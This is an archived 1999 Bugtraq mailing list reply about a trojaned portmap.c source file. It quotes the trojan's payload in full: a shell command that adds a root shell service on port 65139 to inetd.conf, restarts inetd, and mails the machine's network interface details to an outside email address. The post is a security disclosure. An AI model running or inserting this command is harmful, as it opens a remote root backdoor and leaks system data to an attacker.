Bugtraq mailing list archives

Re: portmap.c Trojan

From: wakko () WTOWER COM (Wakko Ellington Warner-Warner III)
Date: Sat, 21 Aug 1999 21:20:55 -0400


On Fri, 20 Aug 1999, goatkiller wrote:

The actual "shellcode" that gets executed follows:

/bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
; /bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail
goat187 () hotmail com 2>&1 2>/dev/null

- A.P.

--

+------------------------------------------+------------------+
| "We are a great software company. That's | NIC: AP5514   16 |
| the only image anyone should have of     | http://bitey.net |
| us." -- Bill Gates                       | wakko () bitey net  |
+------------------------------------------+------------------+

Current thread:

portmap.c Trojan goatkiller (Aug 20)
- Re: portmap.c Trojan Wakko Ellington Warner-Warner III (Aug 21)